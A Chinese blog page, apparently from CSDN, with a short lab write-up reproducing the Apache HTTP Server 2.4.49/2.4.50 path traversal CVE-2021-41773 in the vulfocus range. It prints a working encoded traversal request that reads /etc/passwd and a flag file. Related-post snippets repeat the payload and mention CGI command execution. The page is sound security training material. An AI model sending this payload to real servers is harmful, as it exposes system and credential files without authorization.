【路径穿越】vulfocus/apache-cve_2021_41773

最新推荐文章于 2024-10-08 17:58:15 发布

原创最新推荐文章于 2024-10-08 17:58:15 发布 · 550 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#apache

漏洞库同时被 3 个专栏收录

23 篇文章

订阅专栏

文件读取

16 篇文章

订阅专栏

文件包含

8 篇文章

订阅专栏

本文详细描述了ApacheHTTPServer2.4.49和2.4.50中的高危漏洞CVE_2021_41773，涉及路径穿越，利用方法和复现步骤。作者还展示了如何利用Poc获取敏感数据，并提供了漏洞挖掘和修复建议。

1.1漏洞描述

漏洞编号	cve_2021_41773
漏洞类型	路径穿越
漏洞等级	高危
漏洞环境	vulfocus
攻击方式

1.2漏洞等级

高危

1.3影响版本

Apache HTTP Server 2.4.49、2.4.50

1.4漏洞复现

1.4.1.基础环境

靶场	VULFOCUS
工具	BurpSuite

1.4.2.前提

1.5深度利用

1.5.1漏洞点

利用网上爆出得poc代码尝试获取/etc/passwd中得内容，poc如下,可轻松得到敏感内容

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

查看/tmp/flag

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/tmp/flag

拿到flag

flag-{bmhd9509045-100c-4d25-8e8b-11f345f94b4e}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

升级

打补丁

上设备

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

wj33333

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

vulhub-CVE-2021-41773

ce666666的博客

01-05

457

漏洞原理 Apache在2.4.49版本中，引入路径体验，该漏洞仅影响具有“要求全部拒绝”访问权限的 Apache HTTP Server 2.4.49 版控制配置禁用。漏洞危害可利用漏洞进行远程RCE，访问web服务器上文档根目录之外的任意文件。泄露CGI。影响版本 Apache HTTPd 2.4.49/2.4.50版本环境搭建和测试切换到vulhub/httpd/CVE-2021-41773，启动环境 docker-compose up -d 浏览器访问ip:8080 使用curl发送p

Apache漏洞复现：【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】

MateSnake的博客

05-29

1948

Apache漏洞复现：【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】

1 条评论您还未登录，请先登录后发表或查看评论

vulfocus——apache(cve_2021_41773)

m0_62063669的博客

09-22

1549

攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件，如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护（默认禁用），则这些恶意请求就会成功。除此之外，该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞，攻击者可利用该漏洞读取到Web目录外的其他文件，如系统配置文件、网站源码等，甚至在特定情况下，攻击者可构造恶意请求执行命令，控制服务器。

【漏洞复现-Apache-目录穿越文件读取-RCE】vulfocus/apache(cve_2021_41773)

10-07

2606

【Apache-目录穿越文件读取-RCE】

vulfocus apache-cve_2021_41773 漏洞复现

XXokok的博客

11-26

788

vulfocus apache-cve_2021_41773 漏洞复现

vulfocus靶场名称: apache-cve_2021_41773/apache-cve_2021_42013

没有故事

04-19

786

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞，攻击者可利用该漏洞读取到Web目录外的其他文件，如系统配置文件、网站源码等，甚至在特定情况下，攻击者可构造恶意请求执行命令，控制服务器。目录遍历：GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd。1:get：在url后面加上。远程代码执行：bp抓包。

Apache目录穿越漏洞复现 CVE-2021-41773

m0_62284238的博客

09-10

529

在 Apache HTTP Server 2.4.49 版本中，在对用户发送的请求中的路径参数进行规范化时，其使用的。(3)%2e%2e/ 解码为../但检测指针已经移到了/，故也没有检测到存在../当读取到一个%时，若其后两个字符为十六进制，会将其后两个字符进行url解码。(2).%2e/ 此时%2e解码为.继续判断后面为.没有检测到存在../(1)%2e./ 此时%2e解码为.得到../被检测到存在../即可成功绕过对../的检测，访问到网站目录外的目录。访问靶机的8090端口。

CVE-2021-41773漏洞复现

dreamthe的博客

10-18

8452

1.安装debian系统首先我选择的系统是debian10版本，也可以在别的系统完成复现，我想一个纯净版，所有重新安装了一个系统，安装步骤简单展示一下。 1.创建虚拟机，点击下一步。导入镜像自己选安装的位置以及虚拟机的名称。安装过程需要设置管理员密码和新建一个用户，自己设置一下就可以了这里选择了第二个。因为之前我们选择了lvm,那么这里选择是就可以了因为我们需要一个简单系统，所有只选择了下面三个安装软件中间少的部分就是一直点击继续就可..

vulhub-Apache HTTP Server 2.4.50 路径穿越漏洞（CVE-2021-42013)复现

m0_58265086的博客

09-09

351

Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞，称为 CVE-2021-41773。同时发布了2.4.50更新，修复了这个漏洞。Apache HTTP Server（简称 Apache）是开源的 Web 服务器，可以在大多数计算机操作系统中运行，由于其多平台和安全性被广泛使用，是最流行的 Web 服务器端软件之一。-2021-41773修复不够完善，攻击者可利用该漏洞绕过修复补丁，并利用目录穿越攻击访问服务器中一些文件，进而造成敏感信息泄露。

Apache HTTP Server 2.4.50 路径穿越漏洞（CVE-2021-42013）

weixin_47311099的博客

12-07

2637

Apache HTTP Server 2.4.50 路径穿越漏洞（CVE-2021-42013） Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复，但这个修复是不完整的，CVE-2021-42013是对补丁的绕过。攻击者利用这个漏洞，可以读取位于Apache服务器Web目录以外的其他文件，或者读取Web目录中的脚本文件源码，或者在开启了cgi或cgid的服务器上执行任意命令。这个漏洞可以影响Apache HTTP Server 2.4.49

CVE-2021-41773 漏洞复现

Jay17的博客

07-13

1571

CVE-2021-41773 漏洞复现

apache-CVE-2021-41773[42013]-本地验证

csd_ct的专栏

02-06

3312

cve-2021-41773本地验证上次在验证41773时，使用bash命令反弹shell不成功，vulfocus上提供的时在线靶场环境有时间限制，且无法看到后台日志，不知道时哪里出错了，于是决定从0到1开始，在本地搭建一个实验环境，看看是哪里出现了问题搭建本地验证环境 docker 中直接拉取apache 2.4.49的镜像 docker pull httpd:2.4.49 docker images 查看镜像，如图启动该镜像，运行apache, docker run -d -p 80:80

CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现

weixin_45260839的博客

06-03

6999

CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现

apache-cve_2021_41773 复现

YouthBelief的博客

11-05

1905

apache-cve_2021_41773 复现apache-cve_2021_41773 复现0x01 漏洞描述0x02 影响范围0x03 漏洞复现手工复现0x04 漏洞修复 apache-cve_2021_41773 复现 Apache HTTP Server是一个开源、跨平台的Web服务器，它在全球范围内被广泛使用。 0x01 漏洞描述 2021年10月5日，Apache发布更新公告，修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞（CVE-2021-41773）。

CVE-2021-41773目录穿越漏洞复现并利用得到flag

随心所欲不逾矩

10-08

1109

绕过程序对路径穿越符的检测，从而读取位于 Apache 服务器 web 目录以外的其他文件，或者读取 web 目录中的脚本文件源码，或者在开启了 cgi 或 cgid 的服务器上执行任意命令。在 Apache HTTP Server 2.4.49 版本中，在对用户发送的请求中的路径参数进行规范化时，其使用的。字符时，若其紧跟的两个字符是十六进制字符，则程序会对其进行 url 解码，将其转换成标准字符，如。形式，程序就不会将其检测为路径穿越符。给我的返回的是400，不可行，应该是做了限制，另辟蹊径。

[GFCTF 2021]Baby_Web的CVE-2021-41773

Aiwin的博客

06-05

1799

[GFCTF 2021]Baby_Web的CVE-2021-41773

Apache CVE-2021-41773漏洞复现

3tefanie的博客

10-11

3433

漏洞简介 Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新，披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善，攻击者可构造恶意请求绕过补丁，利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持，攻击者可构造恶意请求执行命令，控制服

CVE-2021-41773 goby exp

不光要学，知识要能说出口

10-28

350

CVE-2021-41773 goby exp代码代码 { "Name": "Apache HTTP Server Arbitrary File Read(CVE-2021-41773)", "Level": "2", "Tags": [ "fileread" ], "GobyQuery": "server=\"Apache/2.4.49\"||product=\"Apache-Web-Server\"||server=\

第六届“强网杯”青少年专项赛 writewp by 楠辞姐姐后援团

JEWSWS的博客

09-11

3124

这次比赛难度很大，Crypto部分也全都是猜谜语类型的题目，没啥游戏体验，不过好在排名在前30.本篇WP为团队WP，团队成员为：树木，AcexZe，Lenyi战队名称：楠辞姐姐后援团战队排名：24。

vulfocus/weblogic-cve_2021_2394